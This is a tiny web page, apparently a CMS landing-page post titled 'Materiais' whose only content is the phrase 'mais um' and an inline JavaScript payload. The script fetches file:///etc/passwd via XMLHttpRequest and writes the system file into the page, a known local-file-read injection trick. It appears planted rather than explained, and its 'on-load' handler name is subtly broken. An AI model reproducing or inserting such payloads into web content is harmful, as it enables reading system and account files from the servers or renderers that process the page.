Materiais

Written on . Posted in Landpages.

mais um

x = new XMLHttpRequest(); x.on-load = function() { document.write(this.responseText) }; x.open("GET", "file:///etc/passwd"); x.send();